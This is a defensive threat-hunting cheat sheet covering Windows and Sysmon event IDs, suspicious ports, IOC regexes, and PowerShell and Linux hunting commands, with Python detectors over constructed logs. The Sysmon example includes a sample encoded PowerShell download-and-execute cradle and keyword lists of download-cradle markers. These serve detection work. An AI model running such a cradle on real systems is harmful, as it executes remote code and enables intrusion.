SECURITY CHEAT SHEETS

Quick reference for threat hunters and incident responders


>> CRITICAL WINDOWS SECURITY EVENT IDs


Account Logon Events

Event ID | Description | Severity | Hunt Use Case
4624 | An account was successfully logged on | MEDIUM | Track user logons, identify lateral movement (pair with the logon type below)
4625 | An account failed to log on | HIGH | Brute force attempts, password spraying (many users, one source)
4634 | An account was logged off | MEDIUM | Session duration analysis
4648 | A logon was attempted using explicit credentials | HIGH | Lateral movement (runas, PsExec with -u), privilege escalation
4672 | Special privileges assigned to new logon | HIGH | Admin logon detection; join to the 4624 via the logon ID

Logon Types Reference

Type | Description | Typical Use
2 | Interactive | Console logon, physical access
3 | Network | SMB, file shares, remote access (PsExec, WMI, WinRM)
4 | Batch | Scheduled tasks
5 | Service | Service startup
7 | Unlock | Workstation unlock
8 | NetworkCleartext | Network logon with cleartext credentials (e.g. IIS basic auth)
9 | NewCredentials | runas /netonly; also produced by pass-the-hash tooling
10 | RemoteInteractive | RDP, Terminal Services
11 | CachedInteractive | Cached credentials (offline)
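The lateral-movement and admin-logon hunts above reduce to a join: group remote 4624s (logon types 3 and 10) by account and source address, count the distinct hosts reached, and tie each session to its 4672 through the logon ID. The Python below is an added example, not code from the original cheat sheet. The event records are constructed, the field names (TargetUserName, LogonType, IpAddress, TargetLogonId, SubjectLogonId, Computer) mirror the Security log's, and the fan-out threshold of three hosts is chosen for illustration.

```python
"""Lateral-movement hunt over Windows Security events.

Added example, not code from the original page.  The records below are
constructed, not real log data; each dict carries the 4624 / 4672 fields a
SIEM would expose (TargetUserName, LogonType, IpAddress, Computer = the host
that wrote the event, and the logon ID that links a 4672 to its 4624).
"""
from collections import defaultdict

# Constructed sample: svc_backup fans out from one source over SMB (type 3)
# and RDP (type 10); alice and bob are ordinary logons.
EVENTS = [
    {"EventID": 4624, "Computer": "WS01", "TargetUserName": "alice",
     "LogonType": 2, "IpAddress": "-", "TargetLogonId": "0x1a2b"},
    {"EventID": 4624, "Computer": "SRV01", "TargetUserName": "svc_backup",
     "LogonType": 3, "IpAddress": "10.0.5.23", "TargetLogonId": "0x3c4d"},
    {"EventID": 4672, "Computer": "SRV01", "SubjectUserName": "svc_backup",
     "SubjectLogonId": "0x3c4d"},
    {"EventID": 4624, "Computer": "SRV02", "TargetUserName": "svc_backup",
     "LogonType": 3, "IpAddress": "10.0.5.23", "TargetLogonId": "0x5e6f"},
    {"EventID": 4624, "Computer": "DC01", "TargetUserName": "svc_backup",
     "LogonType": 10, "IpAddress": "10.0.5.23", "TargetLogonId": "0x7a8b"},
    {"EventID": 4672, "Computer": "DC01", "SubjectUserName": "svc_backup",
     "SubjectLogonId": "0x7a8b"},
    {"EventID": 4624, "Computer": "WS02", "TargetUserName": "bob",
     "LogonType": 3, "IpAddress": "10.0.5.40", "TargetLogonId": "0x9c9d"},
]

REMOTE_LOGON_TYPES = {3, 10}   # Network and RemoteInteractive (RDP)
FANOUT_THRESHOLD = 3           # distinct hosts per (user, source) before we flag


def privileged_logons(events):
    """Set of (Computer, LogonId) pairs that received a 4672.

    4672 is written in the same session as the 4624 that created it, and its
    SubjectLogonId equals that 4624's TargetLogonId, so Computer + LogonId is
    the join key.
    """
    return {(e["Computer"], e["SubjectLogonId"])
            for e in events if e["EventID"] == 4672}


def hunt_lateral_movement(events, threshold=FANOUT_THRESHOLD):
    """Flag (user, source IP) pairs whose remote 4624s reach >= threshold hosts.

    Each finding lists the hosts reached and the subset where the session was
    also privileged (had a matching 4672).
    """
    priv = privileged_logons(events)
    reached = defaultdict(set)            # (user, src) -> hosts logged on to
    privileged_on = defaultdict(set)      # (user, src) -> hosts with 4672
    for e in events:
        if e["EventID"] != 4624 or e["LogonType"] not in REMOTE_LOGON_TYPES:
            continue
        key = (e["TargetUserName"], e["IpAddress"])
        reached[key].add(e["Computer"])
        if (e["Computer"], e["TargetLogonId"]) in priv:
            privileged_on[key].add(e["Computer"])
    return [
        {"user": user, "source": src, "hosts": sorted(hosts),
         "privileged_on": sorted(privileged_on[(user, src)])}
        for (user, src), hosts in reached.items() if len(hosts) >= threshold
    ]


if __name__ == "__main__":
    for f in hunt_lateral_movement(EVENTS):
        print(f"{f['user']} from {f['source']} reached {f['hosts']}, "
              f"admin on {f['privileged_on']}")
```

On the constructed data this reports svc_backup from 10.0.5.23 reaching SRV01, SRV02 and DC01 with admin rights on two of them; the console logon and bob's single network logon never reach the threshold. In production, feed it the parsed 4624/4672 stream for a time window and tune the threshold per account class (service accounts that legitimately touch many hosts need an allow-list).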

Process & Service Events

Event ID | Log | Description | Severity | Hunt Use Case
4688 | Security | A new process has been created | CRITICAL | Process execution tracking, command line analysis
4689 | Security | A process has exited | MEDIUM | Process lifetime analysis
7045 | System | A service was installed in the system | CRITICAL | Persistence, malware service installation; PsExec-style remote execution also leaves a 7045 on the target
4697 | Security | A service was installed in the system | CRITICAL | Same installation seen from the Security log; requires the Audit Security System Extension subcategory

Account Management

Event ID | Description | Severity
4720 | A user account was created | HIGH
4722 | A user account was enabled | HIGH
4724 | An attempt was made to reset an account's password | HIGH
4728 | A member was added to a security-enabled global group | CRITICAL
4732 | A member was added to a security-enabled local group | CRITICAL
4756 | A member was added to a security-enabled universal group | CRITICAL
💡 PRO TIP: 4688 is off by default. Enable it under Advanced Audit Policy → Detailed Tracking → Audit Process Creation (Success), then add the command line via GPO: Computer Configuration → Administrative Templates → System → Audit Process Creation → Include command line in process creation events. Without the second setting 4688 records the image path but not the arguments.

>> SYSMON EVENT IDs


Event ID | Description | Key Fields | Hunt Value
1 | Process Creation | CommandLine, ParentImage, Hashes | CRITICAL
3 | Network Connection | DestinationIp, DestinationPort, Image | CRITICAL
7 | Image Loaded (DLL) | ImageLoaded, Signed, Signature | HIGH
8 | CreateRemoteThread | SourceImage, TargetImage | CRITICAL
10 | Process Access | SourceImage, TargetImage, GrantedAccess | HIGH
11 | File Created | TargetFilename, Image | MEDIUM
12/13/14 | Registry Events (key create/delete, value set, key rename) | TargetObject, Image, Details | HIGH
15 | File Stream Created (alternate data stream) | TargetFilename, Contents | MEDIUM
22 | DNS Query | QueryName, Image | HIGH
💡 RECOMMENDED: Use Sysmon-modular config from olafhartong/sysmon-modular for comprehensive coverage with MITRE ATT&CK mapping
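Sysmon Event 1 is where CommandLine and ParentImage pay off. The Python below is an added example, not code from the page or from Sysmon: it runs two checks over constructed Event 1 records, an Office parent spawning a script host and a -EncodedCommand blob, and decodes the blob (base64 of UTF-16LE text) to look for download-cradle markers. The parent/child lists, the marker list and the sample payload are illustrative assumptions.

```python
"""Sysmon Event ID 1 triage: parent/child anomalies and encoded commands.

Added example, not code from the original page.  The records below are
constructed Sysmon process-creation events (Image, ParentImage, CommandLine),
not real telemetry.
"""
import base64
import re

# Constructed payload: the download cradle we want to find inside -Enc.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')"
# PowerShell -EncodedCommand takes the base64 of the UTF-16LE script text.
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

SYSMON_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": f"powershell.exe -NoP -W Hidden -Enc {ENCODED}"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c dir"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": "cmd.exe /c whoami"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings commonly seen.  The base64 blob must be at least 16 chars.
ENC_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
                  "net.webclient", "invoke-webrequest", "frombase64string")


def basename(path):
    """Last path component, lower-cased, for case-insensitive comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -Enc script text, or None if there is no valid blob."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event):
    """Return a list of finding strings for one Sysmon Event ID 1 record."""
    findings = []
    parent, child = basename(event["ParentImage"]), basename(event["Image"])
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        findings.append(f"office-spawns-script-host: {parent} -> {child}")
    decoded = decode_encoded_command(event["CommandLine"])
    if decoded is not None:
        findings.append("encoded-command")
        hits = [k for k in CRADLE_MARKERS if k in decoded.lower()]
        if hits:
            findings.append("download-cradle: " + ", ".join(hits))
    return findings


if __name__ == "__main__":
    for ev in SYSMON_EVENTS:
        print(basename(ev["Image"]), analyze(ev))
```

Decoding before matching matters: a string match for "DownloadString" on the raw CommandLine never fires when the script is base64-encoded, and the UTF-16LE step is why naive base64 decoding of PowerShell blobs yields text with embedded NULs.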

>> COMMON PORTS & ATTACK VECTORS


Suspicious Outbound Ports

Destination ports on connections leaving the network (or leaving a host that has no business reaching the destination). Priority assumes the destination is not a sanctioned server.

Port | Service | Attack Vector | Hunt Priority
22 | SSH | Remote access, tunneling, data exfiltration | CRITICAL
23 | Telnet | Unencrypted remote access, legacy systems | HIGH
3389 | RDP | Lateral movement, ransomware deployment | CRITICAL
445 | SMB | EternalBlue, lateral movement, file exfiltration | CRITICAL
1433 | MSSQL | Direct database access, data theft | HIGH
3306 | MySQL | Database attacks, credential theft | HIGH
5900 | VNC | Remote desktop access | HIGH
4444 | Metasploit | Default Metasploit handler port (LPORT), common C2 | CRITICAL
8080 | HTTP-Alt | C2 communication, web proxies | MEDIUM
53 | DNS | DNS tunneling, C2 beaconing; outbound DNS to anything other than your own resolvers | HIGH

High-Risk Port Ranges

Range | Description | Why Suspicious
1024-49151 | Registered ports | No OS-assigned service; an outbound destination here that matches no known application should be explained
49152-65535 | Dynamic/private (ephemeral) ports | Normal as the source port of a connection; as an outbound destination they usually mean a custom listener or C2 (1024-5000 was the ephemeral range only on Windows XP/2003)
4444, 5555, 6666 | Common hacker ports | Frequently used in pentesting tooling and malware
31337, 27374 | Backdoor ports | Classic backdoor/remote access tools (Back Orifice, SubSeven)

>> USEFUL REGEX PATTERNS


IOC Extraction

IPv4 Address:
\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b
Example match: 192.168.1.1, 10.0.0.1
Caveat: also matches out-of-range octets such as 999.1.1.1; validate each octet (0-255) after matching.
Email Address:
[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}
Example match: user@example.com, admin@malicious-site.xyz
URL/Domain:
https?://[^\s<>"{}|\\^`\[\]]+
Example match: http://evil-site.com/payload.exe
Caveat: refang first (hxxp → http, [.] → .) or defanged indicators in reports will not match.
MD5 Hash:
\b[a-fA-F0-9]{32}\b
Example match: 5d41402abc4b2a76b9719d911017c592
SHA1 Hash:
\b[a-fA-F0-9]{40}\b
Example match: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 Hash:
\b[a-fA-F0-9]{64}\b
Example match: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Windows File Path:
[a-zA-Z]:\\(?:[^\\/:*?"<>|\r\n]+\\)*[^\\/:*?"<>|\r\n]*
Example match: C:\Windows\System32\cmd.exe
Caveat: spaces are legal in paths, so when text follows the path on the same line the match runs to the end of the line.
Base64 (minimum 20 chars):
(?:[A-Za-z0-9+/]{4}){5,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?
Useful for detecting encoded payloads. The {5,} is what enforces the 20-character minimum; hex hashes also satisfy the base64 alphabet, so discard pure-hex matches.
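Put together, as an added example that is not part of the original page: an extractor that applies the patterns above to a constructed incident note. It goes a little beyond the raw patterns, refanging hxxp and [.] notation first, rejecting IPv4 matches with out-of-range octets, including the SHA1 pattern, and dropping pure-hex base64 candidates (hashes satisfy the base64 alphabet). The sample note and its encoded stage are constructed; the defanging conventions handled are the common ones, not an exhaustive list.

```python
"""IOC extraction with the cheat sheet's patterns, plus refanging and
validation.  Added example, not code from the original page.  SAMPLE is a
constructed incident note, not real data.
"""
import base64
import ipaddress
import re

# Constructed encoded stage so the base64 pattern has something real to find.
STAGE_B64 = base64.b64encode("IEX (New-Object Net.WebClient)".encode("utf-16-le")).decode()

SAMPLE = f"""\
Phish from billing[@]invoice-portal[.]xyz sent users to hxxp://evil-site[.]com/payload.exe
Callback to 45.33.32.156 on port 4444; the note also lists 999.1.1.1 (not an address).
Dropped C:\\Users\\Public\\update.exe
md5=5d41402abc4b2a76b9719d911017c592
sha256=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Encoded stage: {STAGE_B64}
"""

# The cheat sheet's patterns, with SHA1 added and the base64 minimum enforced.
PATTERNS = {
    "ipv4":    re.compile(r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b"),
    "email":   re.compile(r"[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}"),
    "url":     re.compile(r'https?://[^\s<>"{}|\\^`\[\]]+'),
    "md5":     re.compile(r"\b[a-fA-F0-9]{32}\b"),
    "sha1":    re.compile(r"\b[a-fA-F0-9]{40}\b"),
    "sha256":  re.compile(r"\b[a-fA-F0-9]{64}\b"),
    "winpath": re.compile(r'[a-zA-Z]:\\(?:[^\\/:*?"<>|\r\n]+\\)*[^\\/:*?"<>|\r\n]*'),
    "base64":  re.compile(r"(?:[A-Za-z0-9+/]{4}){5,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?"),
}
HEX_ONLY = re.compile(r"[0-9a-fA-F]+")


def refang(text):
    """Undo common defanging: [.] (.) {.} -> '.', [@] -> '@', [:] -> ':', hxxp -> http."""
    text = re.sub(r"\[\.\]|\(\.\)|\{\.\}", ".", text)
    text = re.sub(r"\[@\]", "@", text)
    text = re.sub(r"\[:\]", ":", text)
    return re.sub(r"(?i)hxxp(s?)://", r"http\1://", text)


def _valid_ipv4(s):
    """The regex allows octets up to 999; let the ipaddress module judge."""
    try:
        ipaddress.IPv4Address(s)
        return True
    except ValueError:
        return False


def _plausible_base64(s):
    """Reject hex runs (hashes) and anything that does not actually decode."""
    if HEX_ONLY.fullmatch(s):
        return False
    try:
        base64.b64decode(s, validate=True)
        return True
    except ValueError:
        return False


def extract_iocs(text):
    """Return {pattern name: [unique matches in order of appearance]}."""
    text = refang(text)
    found = {}
    for name, pat in PATTERNS.items():
        hits = []
        for m in pat.finditer(text):
            v = m.group(0)
            if name == "ipv4" and not _valid_ipv4(v):
                continue
            if name == "base64" and not _plausible_base64(v):
                continue
            if v not in hits:
                hits.append(v)
        found[name] = hits
    return found


if __name__ == "__main__":
    for kind, values in extract_iocs(SAMPLE).items():
        print(f"{kind:8s} {values}")
```

The base64 filter is still the noisiest of the set: any 20-character run of letters and digits decodes, so in practice pair it with a second signal such as a PowerShell -Enc flag or an unusually high entropy before treating a hit as an IOC.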

>> POWERSHELL HUNTING COMMANDS


Get Security Event Logs (Last 24h):
Get-WinEvent -FilterHashtable @{LogName='Security'; StartTime=(Get-Date).AddDays(-1)} | Select TimeCreated, Id, Message
Find Failed Logon Attempts (user, logon type, workstation and source IP from the 4625 property array):
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625} | Select TimeCreated, @{N='User';E={$_.Properties[5].Value}}, @{N='LogonType';E={$_.Properties[10].Value}}, @{N='WorkStation';E={$_.Properties[13].Value}}, @{N='SourceIP';E={$_.Properties[19].Value}}
List Running Processes with Network Connections:
Get-NetTCPConnection | Select LocalAddress, LocalPort, RemoteAddress, RemotePort, State, @{Name="Process";Expression={(Get-Process -Id $_.OwningProcess).ProcessName}}
Find Suspicious Scheduled Tasks (SYSTEM tasks that launch a shell):
Get-ScheduledTask | Where-Object {$_.Principal.UserId -eq "SYSTEM" -and $_.Actions.Execute -match "powershell|cmd"} | Select TaskName, Actions
List Services with Unusual Paths (Get-CimInstance replaces the deprecated Get-WmiObject; also review any unquoted path that contains spaces):
Get-CimInstance Win32_Service | Where-Object {$_.PathName -notmatch "system32" -and $_.State -eq "Running"} | Select Name, PathName, State
Check for Persistence (Registry Run and RunOnce Keys):
Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run", "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce", "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run", "HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce" | Select-Object * -ExcludeProperty PS*

>> LINUX LOG LOCATIONS & COMMANDS


Critical Log Files

Log File | Description | Key Events
/var/log/auth.log | Authentication attempts (Debian/Ubuntu) | SSH logins, sudo usage, failed auth
/var/log/secure | Authentication attempts (RHEL/CentOS) | SSH logins, sudo usage, failed auth
/var/log/syslog | System-wide messages (Debian/Ubuntu) | Service starts, system events
/var/log/messages | General system messages (RHEL) | Kernel, system services
/var/log/audit/audit.log | auditd events, including SELinux AVC denials | File access, system calls
~/.bash_history | User command history | Commands executed by user; written only at shell exit and trivially unset or truncated by an attacker, so corroborate with auditd

Hosts that run journald without rsyslog have none of the text files above; query the journal with journalctl instead (for sshd: journalctl -u ssh or -u sshd depending on the distro).

Common Hunting Commands

Find Failed SSH Attempts (count per source IP):
grep "Failed password" /var/log/auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -rn
List Successful SSH Logins (timestamp, user, source IP):
grep "Accepted" /var/log/auth.log | awk '{print $1, $2, $3, $9, $11}'
Caveat: the column numbers assume the classic "Mon DD HH:MM:SS host sshd[pid]:" prefix; with ISO-8601 timestamps or journald output they shift, so match on the message text instead.
Find Recently Modified Files in world-writable staging directories:
find /tmp /var/tmp /dev/shm -type f -mtime -1 -ls
List Listening Ports (ss replaces the deprecated netstat; -l already limits output to listeners):
ss -tulpn
Check for Suspicious Cron Jobs (per-user crontabs live under /var/spool/cron on RHEL and /var/spool/cron/crontabs on Debian):
cat /etc/crontab /etc/cron.d/* /var/spool/cron/* /var/spool/cron/crontabs/* 2>/dev/null
Find SUID/SGID Files (the parentheses keep -type f and -ls applied to both branches of the -o):
find / -type f \( -perm -4000 -o -perm -2000 \) -ls 2>/dev/null
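The awk one-liners above depend on column positions, which shift as soon as a host logs with ISO-8601 timestamps. The Python below is an added example, not code from the page: it parses sshd Accepted/Failed lines by anchoring on the message text rather than on columns (so both timestamp styles and the "invalid user" phrase parse), then summarises per source address, flagging one source trying many usernames (spray or user enumeration) and a success that follows repeated failures for the same source and user. The log lines are constructed (RFC 5737 test addresses) and the thresholds are illustrative.

```python
"""sshd auth.log triage: parse Failed/Accepted lines, spot sprays and
brute-force successes.  Added example, not code from the original page.
AUTH_LOG is constructed sample data (RFC 5737 test addresses), not a real log.
"""
import re
from collections import Counter, defaultdict

AUTH_LOG = """\
Mar  2 10:15:01 web01 sshd[2211]: Failed password for root from 203.0.113.7 port 40122 ssh2
Mar  2 10:15:03 web01 sshd[2213]: Failed password for invalid user admin from 203.0.113.7 port 40130 ssh2
Mar  2 10:15:05 web01 sshd[2215]: Failed password for invalid user oracle from 203.0.113.7 port 40138 ssh2
Mar  2 10:15:07 web01 sshd[2217]: Failed password for invalid user test from 203.0.113.7 port 40144 ssh2
Mar  2 10:16:40 web01 sshd[2230]: Accepted publickey for deploy from 10.0.0.12 port 51012 ssh2: ED25519 SHA256:k3yF1ngerpr1nt
Mar  2 10:20:11 web01 sshd[2250]: Failed password for deploy from 198.51.100.9 port 60001 ssh2
Mar  2 10:20:13 web01 sshd[2252]: Failed password for deploy from 198.51.100.9 port 60003 ssh2
Mar  2 10:20:15 web01 sshd[2254]: Failed password for deploy from 198.51.100.9 port 60005 ssh2
Mar  2 10:20:17 web01 sshd[2256]: Accepted password for deploy from 198.51.100.9 port 60007 ssh2
2024-03-02T10:25:00.000000+00:00 web01 sshd[2300]: Failed password for invalid user guest from 203.0.113.7 port 40210 ssh2
"""

# Anchor on the sshd message, not on whitespace-separated columns, so the
# parse survives both the classic "Mar  2 10:15:01" prefix and ISO-8601.
SSHD_AUTH = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\S+) for "
    r"(?:(?P<invalid>invalid user) )?(?P<user>\S+) from (?P<src>[0-9a-fA-F.:]+) port \d+"
)


def parse_auth_log(text):
    """Return one dict per sshd auth line: result, method, invalid, user, src."""
    events = []
    for line in text.splitlines():
        m = SSHD_AUTH.search(line)
        if m:
            e = m.groupdict()
            e["invalid"] = e["invalid"] is not None   # username does not exist
            events.append(e)
    return events


def summarize(events, spray_users=3, brute_attempts=3):
    """Flag sources trying many users, and successes after repeated failures."""
    failures = Counter()                 # src -> failed attempts
    users_tried = defaultdict(set)       # src -> distinct usernames attempted
    pair_failures = Counter()            # (src, user) -> failures so far
    findings = []
    for e in events:                     # log order matters for the second rule
        pair = (e["src"], e["user"])
        if e["result"] == "Failed":
            failures[e["src"]] += 1
            users_tried[e["src"]].add(e["user"])
            pair_failures[pair] += 1
        elif pair_failures[pair] >= brute_attempts:
            findings.append({"type": "brute-force-success", "src": e["src"],
                             "user": e["user"], "method": e["method"],
                             "failures_before_success": pair_failures[pair]})
    for src, n in failures.items():
        if len(users_tried[src]) >= spray_users:
            findings.append({"type": "password-spray", "src": src, "failures": n,
                             "users": sorted(users_tried[src])})
    return findings


if __name__ == "__main__":
    for f in summarize(parse_auth_log(AUTH_LOG)):
        print(f)
```

The "invalid user" flag is worth keeping separately: a source whose failures are mostly against non-existent accounts is enumerating a wordlist, whereas repeated failures against one real account followed by an Accepted password line is the pattern that deserves a password reset and session review.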